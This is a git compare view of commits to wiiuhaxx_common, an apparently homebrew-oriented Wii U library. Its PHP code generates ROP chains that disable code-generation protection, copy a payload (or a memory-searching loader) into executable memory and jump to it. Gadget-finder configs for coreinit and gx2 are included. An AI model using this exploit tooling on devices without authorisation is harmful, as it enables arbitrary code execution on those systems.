mirror of
https://github.com/wiiu-env/wiiuhaxx_common.git
synced 2024-06-02 22:28:45 +02:00
Compare commits
15 Commits
Author | SHA1 | Date | |
---|---|---|---|
|
8d5b8ab0b6 | ||
|
0a24047530 | ||
|
b6909c596b | ||
|
254d89a32c | ||
|
4b56cb4cd0 | ||
|
439b34bc7e | ||
|
1898ab431f | ||
|
9c7073fa3c | ||
|
0ec1c42452 | ||
|
7896f5733e | ||
|
c4affe4294 | ||
|
380fec3ef3 | ||
|
869a2de049 | ||
|
ca5121d198 | ||
|
747c771862 |
2
.gitignore
vendored
2
.gitignore
vendored
|
@ -5,3 +5,5 @@ wiiuhaxx_loader.elf
|
|||
wiiuhaxx_loader.bin
|
||||
tmp/
|
||||
wiiuhaxx_rop_sysver_*
|
||||
wiiuhaxx_searcher.bin
|
||||
wiiuhaxx_searcher.elf
|
||||
|
|
59
Makefile
59
Makefile
|
@ -22,35 +22,54 @@ export READELF := $(PREFIX)readelf
|
|||
export OBJCOPY := $(PREFIX)objcopy
|
||||
DEFINES :=
|
||||
|
||||
COREINIT_PATH := tmp/$(FIRMWARE)/000500101000400A/code/coreinit.rpl
|
||||
COREINIT_PATH_ELF := $(COREINIT_PATH).elf
|
||||
|
||||
ifeq ($(OS),Windows_NT)
|
||||
exe_ext := .exe
|
||||
else
|
||||
exe_ext :=
|
||||
endif
|
||||
COREINIT_CONFIG_PATH := coreinit.yml
|
||||
GX2_CONFIG_PATH := gx2.yml
|
||||
COREINIT_PATH := tmp/$(FIRMWARE)/coreinit.rpl
|
||||
GX2_PATH := tmp/$(FIRMWARE)/gx2.rpl
|
||||
TARGET_FILENAME := wiiuhaxx_rop_sysver_$(FIRMWARE).php
|
||||
GADGET_FINDER_PATH := bin/rpxgadgetfinder.jar
|
||||
|
||||
all: loader locateall
|
||||
|
||||
loader:
|
||||
loader: wiiuhaxx_loader.bin wiiuhaxx_searcher.bin
|
||||
|
||||
wiiuhaxx_loader.bin: wiiuhaxx_loader.s
|
||||
$(CC) -x assembler-with-cpp -nostartfiles -nostdlib $(DEFINES) -o wiiuhaxx_loader.elf wiiuhaxx_loader.s
|
||||
$(OBJCOPY) -O binary wiiuhaxx_loader.elf wiiuhaxx_loader.bin
|
||||
|
||||
wiiuhaxx_searcher.bin: wiiuhaxx_searcher.s
|
||||
$(CC) -x assembler-with-cpp -nostartfiles -nostdlib $(DEFINES) -o wiiuhaxx_searcher.elf wiiuhaxx_searcher.s
|
||||
$(OBJCOPY) -O binary wiiuhaxx_searcher.elf wiiuhaxx_searcher.bin
|
||||
|
||||
locateall: locate532 locate550
|
||||
|
||||
|
||||
locate532:
|
||||
java -jar bin/FileDownloader.jar -titleID 000500101000400A -file '.*coreinit.rpl' -version 11464 -out tmp/532
|
||||
make locatespecific FIRMWARE=532 TEXTADDRESS=0x0101c400
|
||||
|
||||
make locatespecific FIRMWARE=532 ADDRESS_OFFSET_COREINIT=$$((0x02000000-0x0101c400)) ADDRESS_OFFSET_GX2=$$((0x02000000-0x0114EC40))
|
||||
|
||||
locate550:
|
||||
java -jar bin/FileDownloader.jar -titleID 000500101000400A -file '.*coreinit.rpl' -version 15702 -out tmp/550
|
||||
make locatespecific FIRMWARE=550 TEXTADDRESS=0x0101c400
|
||||
|
||||
locatespecific:
|
||||
./bin/rpl2elf$(exe_ext) $(COREINIT_PATH) $(COREINIT_PATH_ELF) > /dev/null
|
||||
sh ./wiiuhaxx_locaterop.sh $(COREINIT_PATH) $(TEXTADDRESS) $(exe_ext) > wiiuhaxx_rop_sysver_$(FIRMWARE).php
|
||||
make locatespecific FIRMWARE=550 ADDRESS_OFFSET_COREINIT=$$((0x02000000-0x0101c400)) ADDRESS_OFFSET_GX2=$$((0x02000000-0x0114EC40))
|
||||
|
||||
checkrpl: $(COREINIT_PATH) $(GX2_PATH)
|
||||
|
||||
$(COREINIT_PATH):
|
||||
if [ -a $(COREINIT_PATH) ]; then $(error missing $(COREINIT_PATH) for FW $(FIRMWARE)); fi;
|
||||
|
||||
$(GX2_PATH):
|
||||
if [ -a $(GX2_PATH) ]; then $(error missing $(GX2_PATH) for FW $(FIRMWARE)); fi;
|
||||
|
||||
$(CONFIG_FILENAME):
|
||||
if [ -a $(CONFIG_FILENAME) ]; then $(error missing $(CONFIG_FILENAME)); fi;
|
||||
|
||||
$(GADGET_FINDER_PATH):
|
||||
if [ -a $(GADGET_FINDER_PATH) ]; then $(error missing $(GADGET_FINDER_PATH)); fi;
|
||||
|
||||
locatespecific: checkrpl $(GADGET_FINDER_PATH) $(CONFIG_FILENAME)
|
||||
@echo "Finding symbols for FW $(FIRMWARE)"
|
||||
@echo "<?php" > $(TARGET_FILENAME)
|
||||
@java -jar $(GADGET_FINDER_PATH) -cin $(COREINIT_CONFIG_PATH) -bin $(COREINIT_PATH) -aoff -$(ADDRESS_OFFSET_COREINIT) >> $(TARGET_FILENAME)
|
||||
@java -jar $(GADGET_FINDER_PATH) -cin $(GX2_CONFIG_PATH) -bin $(GX2_PATH) -aoff -$(ADDRESS_OFFSET_GX2) >> $(TARGET_FILENAME)
|
||||
@echo "?>" >> $(TARGET_FILENAME)
|
||||
|
||||
clean:
|
||||
rm -rf wiiuhaxx_loader.elf wiiuhaxx_loader.bin wiiuhaxx_rop_sysver_* tmp
|
||||
rm -rf wiiuhaxx_loader.elf wiiuhaxx_loader.bin wiiuhaxx_searcher.elf wiiuhaxx_searcher.bin wiiuhaxx_rop_sysver_*
|
||||
|
||||
|
|
12
README.md
12
README.md
|
@ -1,15 +1,16 @@
|
|||
# README
|
||||
|
||||
This fork is supposed a common base for Wii U ROP-chains.
|
||||
This fork is supposed to be a common base for Wii U ROP-chains.
|
||||
|
||||
## Building
|
||||
Before using the ROP-chain, some files need to be compiled/generated, you can do it with `make`.
|
||||
|
||||
The makefile expects some binaries/files.
|
||||
- `bin/ropgadget_patternfinder(.exe)` [Download](https://github.com/wiiu-env/ropgadget_patternfinder/releases)
|
||||
- `bin/rpl2elf(.exe)` [Download](https://github.com/wiiu-env/rpl2elf/releases)
|
||||
- `bin/FileDownloader.jar` [Download](https://github.com/wiiu-env/NUSFileDownloader/releases)
|
||||
- `common.key` containing the retail Wii U common key (in binary form, 16 bytes).
|
||||
- `bin/rpxgadgetfinder.jar` [Download](https://github.com/wiiu-env/RPXGadgetFinder/releases) (requires Java 11(!))
|
||||
- `tmp/532/coreinit.rpl` from 00050010-1000400A OSv10 v11464
|
||||
- `tmp/532/gx2.rpl` from 00050010-1000400A OSv10 v11464
|
||||
- `tmp/550/coreinit.rpl` from 00050010-1000400A OSv10 v15702
|
||||
- `tmp/550/gx2.rpl` from 00050010-1000400A OSv10 v15702
|
||||
|
||||
When you have all needed files, you can use `make`.
|
||||
|
||||
|
@ -106,6 +107,7 @@ For example:
|
|||
|
||||
$wiiuhaxxcfg_payloadfilepath = "<filepath for actual payload, such as wiiuhax_payload.bin, or for example: {projectdir}/bin/code550.bin>";//Remember that this is just an example, you can programmatically select the payload path by checking the request URL/etc if you want as well.
|
||||
$wiiuhaxxcfg_loaderfilepath = "<filepath for wiiuhaxx_loader.bin>";
|
||||
$wiiuhaxxcfg_searchpayloadfilepath = "<filepath for wiiuhaxx_searcher.bin>";
|
||||
|
||||
?>
|
||||
```
|
||||
|
|
74
coreinit.yml
Normal file
74
coreinit.yml
Normal file
|
@ -0,0 +1,74 @@
|
|||
!!de.orb.wiiu.rpxgadgetfinder.SymbolList
|
||||
symbols:
|
||||
- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: memcpy, out: $ROP_memcpy}
|
||||
- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: DCFlushRange, out: $ROP_DCFlushRange}
|
||||
- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: ICInvalidateRange, out: $ROP_ICInvalidateRange}
|
||||
- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: OSSwitchSecCodeGenMode, out: $ROP_OSSwitchSecCodeGenMode}
|
||||
- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: OSCodegenCopy, out: $ROP_OSCodegenCopy}
|
||||
- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: OSGetCodegenVirtAddrRange, out: $ROP_OSGetCodegenVirtAddrRange}
|
||||
- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: OSGetCoreId, out: $ROP_OSGetCoreId}
|
||||
- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: OSGetCurrentThread, out: $ROP_OSGetCurrentThread}
|
||||
- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: OSSetThreadAffinity, out: $ROP_OSSetThreadAffinity}
|
||||
- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: OSYieldThread, out: $ROP_OSYieldThread}
|
||||
- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: OSFatal, out: $ROP_OSFatal}
|
||||
- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: _Exit, out: $ROP_Exit}
|
||||
- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: OSScreenFlipBuffersEx, out: $ROP_OSScreenFlipBuffersEx}
|
||||
- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: OSScreenClearBufferEx, out: $ROP_OSScreenClearBufferEx}
|
||||
- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: OSDynLoad_Acquire, out: $ROP_OSDynLoad_Acquire}
|
||||
- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: OSDynLoad_FindExport, out: $ROP_OSDynLoad_FindExport}
|
||||
- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: __os_snprintf, out: $ROP_os_snprintf}
|
||||
- !!de.orb.wiiu.rpxgadgetfinder.GadgetSymbol
|
||||
hash: !!binary |-
|
||||
yHAg7FCY0T7dPuDQ0BMToKXwp5N/NsD19OlQMWWuM/s=
|
||||
out: $ROP_POPJUMPLR_STACK12
|
||||
size: 16
|
||||
- !!de.orb.wiiu.rpxgadgetfinder.GadgetSymbol
|
||||
hash: !!binary |-
|
||||
3s/zyode/BqcPQrHYY8++j0zylm9P9YCp0fTRpvVwAA=
|
||||
out: $ROP_POPJUMPLR_STACK20
|
||||
size: 16
|
||||
- !!de.orb.wiiu.rpxgadgetfinder.GadgetSymbol
|
||||
hash: !!binary |-
|
||||
UwYkiCHAcqnPXHHJRpFx4XzSlm9m/H1hLOec/41dEko=
|
||||
out: $ROP_CALLFUNC
|
||||
size: 52
|
||||
- !!de.orb.wiiu.rpxgadgetfinder.GadgetSymbol
|
||||
hash: !!binary |-
|
||||
9OdgU6ZcVx8rO4xsbd6XPJX4ibzPCiLrlknLx4EMjpg=
|
||||
out: $ROP_CALLR28_POP_R28_TO_R31
|
||||
size: 44
|
||||
- !!de.orb.wiiu.rpxgadgetfinder.GadgetSymbol
|
||||
hash: !!binary |-
|
||||
R0G4Y63PdC+JKMSFo588yGKUadHdzPnmjJ3RwlNB8JE=
|
||||
out: $ROP_POP_R28R29R30R31
|
||||
size: 32
|
||||
- !!de.orb.wiiu.rpxgadgetfinder.GadgetSymbol
|
||||
hash: !!binary |-
|
||||
lylzvoB06SsPEPxfu6rvbCjikF+ZAHZUzXNaX9aZM/w=
|
||||
out: $ROP_POP_R27
|
||||
size: 20
|
||||
- !!de.orb.wiiu.rpxgadgetfinder.GadgetSymbol
|
||||
hash: !!binary |-
|
||||
b18R/cRB3e+PIYnLyQBlF8SRf89ul1y4y+sjc7+OjKI=
|
||||
out: $ROP_POP_R24_TO_R31
|
||||
size: 20
|
||||
- !!de.orb.wiiu.rpxgadgetfinder.GadgetSymbol
|
||||
hash: !!binary |-
|
||||
5gL2bPiq3E1efbB0rZuPv6QZD4YqghXPJvcHpJypUHA=
|
||||
out: $ROP_CALLFUNCPTR_WITHARGS_FROM_R3MEM
|
||||
size: 40
|
||||
- !!de.orb.wiiu.rpxgadgetfinder.GadgetSymbol
|
||||
hash: !!binary |-
|
||||
Xh+0gQ/2+4a7Uz8gUDBt5uA+CUUIh99ssixthRHD4mc=
|
||||
out: $ROP_SETR3TOR31_POP_R31
|
||||
size: 24
|
||||
- !!de.orb.wiiu.rpxgadgetfinder.GadgetSymbol
|
||||
hash: !!binary |-
|
||||
XO0YJxjoIEwpnqH44pWEGgMl7kk4k7hgU952LMDu+0g=
|
||||
out: $ROP_Register
|
||||
size: 12
|
||||
- !!de.orb.wiiu.rpxgadgetfinder.GadgetSymbol
|
||||
hash: !!binary |-
|
||||
xFfDPPQrAMLgC5bixrCXhIZDvBcui9yfDn2XToM4YLY=
|
||||
out: $ROP_CopyToSaveArea
|
||||
size: 12
|
5
gx2.yml
Normal file
5
gx2.yml
Normal file
|
@ -0,0 +1,5 @@
|
|||
!!de.orb.wiiu.rpxgadgetfinder.SymbolList
|
||||
symbols:
|
||||
- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: GX2Init, out: $ROP_GX2Init}
|
||||
- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: GX2Flush, out: $ROP_GX2Flush}
|
||||
- !!de.orb.wiiu.rpxgadgetfinder.ExportSymbol {name: GX2DirectCallDisplayList, out: $ROP_GX2DirectCallDisplayList}
|
|
@ -2,7 +2,13 @@
|
|||
|
||||
require_once("wiiuhaxx_common_cfg.php");
|
||||
|
||||
if(!isset($wiiuhaxxcfg_payloadfilepath) || !isset($wiiuhaxxcfg_loaderfilepath))die("The filepaths for wiiuhaxxcfg are not set in the cfg file.");
|
||||
if(!isset($ropchainselect))$ropchainselect = -1;
|
||||
if($ropchainselect == -1)
|
||||
{
|
||||
$ropchainselect = 1;
|
||||
}
|
||||
|
||||
if(!isset($wiiuhaxxcfg_payloadfilepath) || (($ropchainselect < 4) && !isset($wiiuhaxxcfg_loaderfilepath)))die("The filepaths for wiiuhaxxcfg are not set in the cfg file.");
|
||||
|
||||
if(!isset($sysver))$sysver = -1;
|
||||
|
||||
|
@ -29,16 +35,6 @@ if($filesysver == 540)$filesysver = 532;
|
|||
|
||||
require_once("wiiuhaxx_rop_sysver_$filesysver.php");
|
||||
|
||||
if(!isset($ROPCHAIN_JS_VAR)) $ROPCHAIN_JS_VAR = false;
|
||||
if(!isset($USE_FIXED_PAYLOAD_LEGNTH)) $USE_FIXED_PAYLOAD_LEGNTH = -1;
|
||||
|
||||
if(!isset($payload_size)) $payload_size = 0x20000; //Doesn't really matter if the actual payload data size in memory is smaller than this or not.
|
||||
|
||||
if(!isset($ropchainselect))$ropchainselect = -1;
|
||||
if($ropchainselect == -1)
|
||||
{
|
||||
$ropchainselect = 1;
|
||||
}
|
||||
|
||||
if(!isset($generatebinrop))$generatebinrop = 0;
|
||||
|
||||
|
@ -95,14 +91,10 @@ function genu32_unicode_jswrap($value)
|
|||
}
|
||||
function ropchain_appendu32($val)
|
||||
{
|
||||
global $ROPCHAIN, $generatebinrop, $ROPCHAIN_JS_VAR;
|
||||
global $ROPCHAIN, $generatebinrop;
|
||||
if($generatebinrop==0)
|
||||
{
|
||||
if($ROPCHAIN_JS_VAR){
|
||||
$ROPCHAIN.= genu32_array($val);
|
||||
}else{
|
||||
$ROPCHAIN.= genu32_unicode($val);
|
||||
}
|
||||
$ROPCHAIN.= genu32_unicode($val);
|
||||
}
|
||||
else
|
||||
{
|
||||
|
@ -112,44 +104,63 @@ function ropchain_appendu32($val)
|
|||
|
||||
function generate_ropchain()
|
||||
{
|
||||
global $ROPCHAIN, $generatebinrop, $ropchainselect, $ROPCHAIN_JS_VAR;
|
||||
global $ROPCHAIN, $generatebinrop, $ropchainselect;
|
||||
|
||||
$ROPCHAIN = "";
|
||||
|
||||
if($generatebinrop==0 && !$ROPCHAIN_JS_VAR)$ROPCHAIN .= "\"";
|
||||
if($generatebinrop==0 && $ROPCHAIN_JS_VAR)$ROPCHAIN .= "var realROPChain = [";
|
||||
if($generatebinrop==0)$ROPCHAIN .= "\"";
|
||||
|
||||
if($ropchainselect==1)
|
||||
{
|
||||
generateropchain_type1();
|
||||
}
|
||||
else if ($ropchainselect==2)
|
||||
{
|
||||
generateropchain_type2();
|
||||
}
|
||||
else if ($ropchainselect==3)
|
||||
{
|
||||
generateropchain_type3();
|
||||
}
|
||||
else if ($ropchainselect==4)
|
||||
{
|
||||
generateropchain_type4();
|
||||
}
|
||||
|
||||
if($generatebinrop==0 && !$ROPCHAIN_JS_VAR)$ROPCHAIN.= "\"";
|
||||
if($generatebinrop==0 && $ROPCHAIN_JS_VAR)$ROPCHAIN .= "];";
|
||||
if($generatebinrop==0)$ROPCHAIN.= "\"";
|
||||
}
|
||||
|
||||
function wiiuhaxx_generatepayload()
|
||||
{
|
||||
global $wiiuhaxxcfg_payloadfilepath, $wiiuhaxxcfg_loaderfilepath, $USE_FIXED_PAYLOAD_LEGNTH;
|
||||
function wiiuhaxx_loadfilebinary($pathToFile){
|
||||
$payload = file_get_contents($pathToFile);
|
||||
if($payload === FALSE || strlen($payload) < 4){
|
||||
die("-1: Failed to load: ". $pathToFile);
|
||||
}
|
||||
|
||||
$actual_payload = file_get_contents($wiiuhaxxcfg_payloadfilepath);
|
||||
if($actual_payload === FALSE || strlen($actual_payload) < 4)return FALSE;
|
||||
$len = strlen($payload);
|
||||
|
||||
while($len & 0x3){
|
||||
$payload.= pack("C*", 0x00);
|
||||
$len = strlen($payload);
|
||||
}
|
||||
return $payload;
|
||||
}
|
||||
|
||||
function wiiuhaxx_generatepayload(){
|
||||
global $wiiuhaxxcfg_payloadfilepath;
|
||||
return wiiuhaxx_loadfilebinary($wiiuhaxxcfg_payloadfilepath);
|
||||
}
|
||||
|
||||
function wiiuhaxx_generatepayloadwithloader()
|
||||
{
|
||||
global $wiiuhaxxcfg_payloadfilepath, $wiiuhaxxcfg_loaderfilepath;
|
||||
|
||||
$actual_payload = wiiuhaxx_loadfilebinary($wiiuhaxxcfg_payloadfilepath);
|
||||
|
||||
$loader = file_get_contents($wiiuhaxxcfg_loaderfilepath);
|
||||
if($loader === FALSE || strlen($loader) < 4)return FALSE;
|
||||
|
||||
if($USE_FIXED_PAYLOAD_LEGNTH != -1){
|
||||
$len = USE_FIXED_PAYLOAD_LEGNTH;
|
||||
}else{
|
||||
$len = strlen($actual_payload);
|
||||
}
|
||||
|
||||
while($len & 0x3)//The actual payload size must be 4-byte aligned.
|
||||
{
|
||||
$actual_payload.= pack("C*", 0x00);
|
||||
$len = strlen($actual_payload);
|
||||
}
|
||||
|
||||
$len = strlen($actual_payload);
|
||||
|
||||
$loader .= pack("N*", $len);
|
||||
|
||||
return $loader . $actual_payload;
|
||||
|
@ -350,6 +361,9 @@ function ropgen_copycodebin_to_codegen($codegen_addr, $codebin_addr, $codebin_si
|
|||
//ropgen_OSGetCodegenVirtAddrRange($ROPHEAP+0x200, $ROPHEAP+0x10+4);
|
||||
//ropgen_callfunc(0x103769C, 0x0, 0x0, 0x0, 0x0, 0x0);//5.5.0 getcodegeninfo syscall
|
||||
//ropgen_display_u32(0);
|
||||
|
||||
ropgen_DCFlushRange($codebin_addr, $codebin_size);
|
||||
ropgen_ICInvalidateRange($codebin_addr, $codebin_size);
|
||||
|
||||
ropgen_OSSwitchSecCodeGenMode(0);
|
||||
ropgen_memcpy($codegen_addr, $codebin_addr, $codebin_size);
|
||||
|
@ -387,6 +401,7 @@ function ropgen_display_u32($skip_printval_initialization)//This prints the valu
|
|||
|
||||
ropchain_appendu32($ROP_CALLR28_POP_R28_TO_R31);//snprintf(outstr, "%x", 0x40, <value of r3 at the time of ropgen_display_u32() entry>);
|
||||
|
||||
$r28 = 0; // This may be wrong, but without this line we get a warning.
|
||||
ropchain_appendu32($r28);//r28
|
||||
ropchain_appendu32(0x0);//r29
|
||||
ropchain_appendu32(0x0);//r30
|
||||
|
@ -419,12 +434,20 @@ function ropgen_switchto_core1()
|
|||
ropchain_appendu32(0x0);
|
||||
}
|
||||
|
||||
function ropgen_writerop_toAddress($path, $dstaddr){
|
||||
$payload = wiiuhaxx_loadfilebinary($path);
|
||||
$len = strlen($payload);
|
||||
for($i = 0; $i < $len; $i +=4) {
|
||||
ropgen_writeword_tomem(hexdec (bin2hex (substr($payload, $i, 4))),$dstaddr + $i);
|
||||
}
|
||||
}
|
||||
|
||||
function generateropchain_type1()
|
||||
{
|
||||
global $ROP_OSFatal, $ROP_Exit, $ROP_OSDynLoad_Acquire, $ROP_OSDynLoad_FindExport, $ROP_os_snprintf, $payload_srcaddr, $ROPHEAP, $ROPCHAIN, $payload_size;
|
||||
global $ROP_OSFatal, $ROP_Exit, $ROP_OSDynLoad_Acquire, $ROP_OSDynLoad_FindExport, $ROP_os_snprintf, $payload_srcaddr, $ROPHEAP, $ROPCHAIN;
|
||||
|
||||
//$payload_size = 0x20000;
|
||||
$codegen_addr = 0x01800000;
|
||||
$payload_size = 0x20000;
|
||||
$codegen_addr = 0x01800000;
|
||||
//$payload_srcaddr must be defined by the code including this .php.
|
||||
|
||||
//ropgen_colorfill(0x1, 0xff, 0xff, 0x0, 0xff);//Color-fill the gamepad screen with yellow.
|
||||
|
@ -432,7 +455,7 @@ function generateropchain_type1()
|
|||
//ropchain_appendu32(0x80808080);//Trigger a crash.
|
||||
|
||||
//ropgen_OSFatal($codepayload_srcaddr);//OSFatal(<data from the haxx>);
|
||||
|
||||
|
||||
ropgen_switchto_core1();//When running under internetbrowser, only core1 is allowed to use codegen. Switch to core1 just in case this thread isn't on core1(with some exploit(s) it may already be one core1, but do this anyway). OSSetThreadAffinity() currently returns an error for this, hence this codebase is only usable when this ROP is already running on core1.
|
||||
|
||||
ropgen_copycodebin_to_codegen($codegen_addr, $payload_srcaddr, $payload_size);
|
||||
|
@ -460,4 +483,110 @@ function generateropchain_type1()
|
|||
ropchain_appendu32($codegen_addr);
|
||||
}
|
||||
|
||||
// The rop may get quite big here.
|
||||
function generateropchain_type2(){
|
||||
global $payload_srcaddr, $ROPHEAP, $ROPCHAIN, $wiiuhaxxcfg_payloadfilepath;
|
||||
|
||||
$payload_size = 0x20000;
|
||||
$codegen_addr = 0x01800000;
|
||||
//$payload_srcaddr must be defined by the code including this .php.
|
||||
|
||||
// Write payload from file to
|
||||
ropgen_writerop_toAddress($wiiuhaxxcfg_payloadfilepath, $payload_srcaddr);
|
||||
|
||||
//When running under internetbrowser, only core1 is allowed to use codegen. Switch to core1 just in case this thread isn't on core1(with some exploit(s) it may already be one core1, but do this anyway). OSSetThreadAffinity() currently returns an error for this, hence this codebase is only usable when this ROP is already running on core1.
|
||||
ropgen_switchto_core1();
|
||||
|
||||
// Copy to codegen
|
||||
ropgen_copycodebin_to_codegen($codegen_addr, $payload_srcaddr, $payload_size);
|
||||
|
||||
// Go!
|
||||
ropchain_appendu32($codegen_addr);
|
||||
}
|
||||
|
||||
// Print payload_srcaddr.
|
||||
function generateropchain_type3(){
|
||||
global $payload_srcaddr;
|
||||
ropgen_OSFatal($payload_srcaddr);
|
||||
}
|
||||
|
||||
function ropgen_GX2DirectCallDisplayList($addr,$size){
|
||||
global $ROP_GX2DirectCallDisplayList;
|
||||
ropgen_callfunc($ROP_GX2DirectCallDisplayList, $addr, $size, 0x0, 0x0, 0x0);
|
||||
}
|
||||
|
||||
function ropgen_GX2Flush(){
|
||||
global $ROP_GX2Flush;
|
||||
ropgen_callfunc($ROP_GX2Flush, 0x0, 0x0, 0x0, 0x0, 0x0);
|
||||
}
|
||||
|
||||
function ropgen_Register($namePtr,$nameSize,$arg3,$arg4){
|
||||
global $ROP_Register;
|
||||
ropgen_callfunc($ROP_Register, $namePtr, $nameSize, $arg3, $arg4, 0x0);
|
||||
}
|
||||
|
||||
function ropgen_CopyToSaveArea($namePtr,$nameSize,$srcAddr,$srcLen){
|
||||
global $ROP_CopyToSaveArea;
|
||||
ropgen_callfunc($ROP_CopyToSaveArea, $namePtr, $nameSize, $srcAddr, $srcLen, 0x0);
|
||||
}
|
||||
|
||||
function generateropchain_type4()
|
||||
{
|
||||
global $ROP_OSFatal, $ROP_Exit, $ROPHEAP, $ROPCHAIN, $payload_tmp_address, $wiiuhaxxcfg_searchpayloadfilepath, $payload_start_search,$valid_payload_dst_address, $payload_search_for;
|
||||
|
||||
$payload_size = 0x20000;
|
||||
$codegen_addr = 0x01800000;
|
||||
|
||||
// $payload_tmp_address where to store payload from ROP.
|
||||
if(!isset($payload_tmp_address)){
|
||||
die('please set $payload_tmp_address to a valid, unused, tmp address.');
|
||||
}
|
||||
// $payload_start_search. start address of the payload search.
|
||||
if(!isset($payload_start_search)){
|
||||
die('please set $payload_start_search. This should contain the start address of the payload search');
|
||||
}
|
||||
//$valid_payload_dst_address = 0x1D500000;
|
||||
if(!isset($valid_payload_dst_address)){
|
||||
die('please set $valid_payload_dst_address. This should address a region of 0x20000 bytes where the found payload it copied to.');
|
||||
}
|
||||
//$payload_search_for
|
||||
if(!isset($payload_search_for)){
|
||||
die('please set $payload_search_for. This should contain a unqiue u32 value that is placed right before the payload.');
|
||||
}
|
||||
|
||||
// size
|
||||
$search_payload_length = strlen(wiiuhaxx_loadfilebinary($wiiuhaxxcfg_searchpayloadfilepath));
|
||||
|
||||
ropgen_switchto_core1();//When running under internetbrowser, only core1 is allowed to use codegen. Switch to core1 just in case this thread isn't on core1(with some exploit(s) it may already be one core1, but do this anyway). OSSetThreadAffinity() currently returns an error for this, hence this codebase is only usable when this ROP is already running on core1.
|
||||
|
||||
// Write our search payload somewhere into mem
|
||||
ropgen_writerop_toAddress($wiiuhaxxcfg_searchpayloadfilepath,$payload_tmp_address);
|
||||
|
||||
// Copy it to codegen
|
||||
ropgen_copycodebin_to_codegen($codegen_addr, $payload_tmp_address, $search_payload_length);
|
||||
|
||||
// Set up some parameters
|
||||
$regs = array();
|
||||
$regs[24 - 24] = $ROP_OSFatal;//r24
|
||||
$regs[25 - 24] = $ROP_Exit;//r25
|
||||
$regs[26 - 24] = $payload_size;//r26 sizeToCopy
|
||||
$regs[27 - 24] = $payload_search_for - 0x04;// r27 SearchFor. substract 0x4 so we didn't find THIS accidentally.
|
||||
$regs[28 - 24] = $payload_start_search; //r28 start of search
|
||||
$regs[29 - 24] = $valid_payload_dst_address ; //r29 target address
|
||||
$regs[30 - 24] = 0x8;//r30 The payload can do this at entry to determine the start address of the code-loading ROP-chain: r1+= r30. r1+4 after that is where the jump-addr should be loaded from. The above r29 is a ptr to the input data used for payload loading.
|
||||
$regs[31 - 24] = $ROPHEAP;//r31
|
||||
ropgen_pop_r24_to_r31($regs);//Setup r24..r31 at the time of payload entry. Basically a "paramblk" in the form of registers, since this is the only available way to do this with the ROP-gadgets currently used by this codebase.
|
||||
|
||||
// And run it!
|
||||
ropchain_appendu32($codegen_addr);//Jump to the codegen area where the payload was written.
|
||||
|
||||
// We need this, not sure why tbh.
|
||||
ropchain_appendu32(0x0);
|
||||
|
||||
// On success, we should now have our actual payload @valid_payload_dst_address. Lets copy it to codegen.
|
||||
ropgen_copycodebin_to_codegen($codegen_addr, $valid_payload_dst_address, $payload_size);
|
||||
// and run it!
|
||||
ropchain_appendu32($codegen_addr);
|
||||
}
|
||||
|
||||
?>
|
||||
|
|
|
@ -1,34 +0,0 @@
|
|||
ospath=$1
|
||||
coreinit_textaddr=$2
|
||||
extension=$3
|
||||
|
||||
reloc=$((0x02000000-$coreinit_textaddr))
|
||||
|
||||
|
||||
getcoreinit_symboladdr()
|
||||
{
|
||||
val=`powerpc-eabi-readelf -a "$PWD/$ospath.elf" | grep "$1" | head -n 1 | cut -d: -f2 | cut "-d " -f2`
|
||||
printf "$2 = 0x%X;\n" $((0x$val-$reloc))
|
||||
}
|
||||
|
||||
echo "<?php"
|
||||
./bin/ropgadget_patternfinder$extension $ospath.elf --baseaddr=$coreinit_textaddr "--plainsuffix=;" --script=wiiuhaxx_locaterop_script #?1EFE3500?
|
||||
echo ""
|
||||
getcoreinit_symboladdr "memcpy" "\$ROP_memcpy"
|
||||
getcoreinit_symboladdr "DCFlushRange" "\$ROP_DCFlushRange"
|
||||
getcoreinit_symboladdr "ICInvalidateRange" "\$ROP_ICInvalidateRange"
|
||||
getcoreinit_symboladdr "OSSwitchSecCodeGenMode" "\$ROP_OSSwitchSecCodeGenMode"
|
||||
getcoreinit_symboladdr "OSCodegenCopy" "\$ROP_OSCodegenCopy"
|
||||
getcoreinit_symboladdr "OSGetCodegenVirtAddrRange" "\$ROP_OSGetCodegenVirtAddrRange"
|
||||
getcoreinit_symboladdr "OSGetCoreId" "\$ROP_OSGetCoreId"
|
||||
getcoreinit_symboladdr "OSGetCurrentThread" "\$ROP_OSGetCurrentThread"
|
||||
getcoreinit_symboladdr "OSSetThreadAffinity" "\$ROP_OSSetThreadAffinity"
|
||||
getcoreinit_symboladdr "OSYieldThread" "\$ROP_OSYieldThread"
|
||||
getcoreinit_symboladdr "OSFatal" "\$ROP_OSFatal"
|
||||
getcoreinit_symboladdr "_Exit" "\$ROP_Exit"
|
||||
getcoreinit_symboladdr "OSScreenFlipBuffersEx" "\$ROP_OSScreenFlipBuffersEx"
|
||||
getcoreinit_symboladdr "OSScreenClearBufferEx" "\$ROP_OSScreenClearBufferEx"
|
||||
getcoreinit_symboladdr "OSDynLoad_Acquire" "\$ROP_OSDynLoad_Acquire"
|
||||
getcoreinit_symboladdr "OSDynLoad_FindExport" "\$ROP_OSDynLoad_FindExport"
|
||||
getcoreinit_symboladdr "__os_snprintf" "\$ROP_os_snprintf"
|
||||
echo "?>"
|
|
@ -1,9 +0,0 @@
|
|||
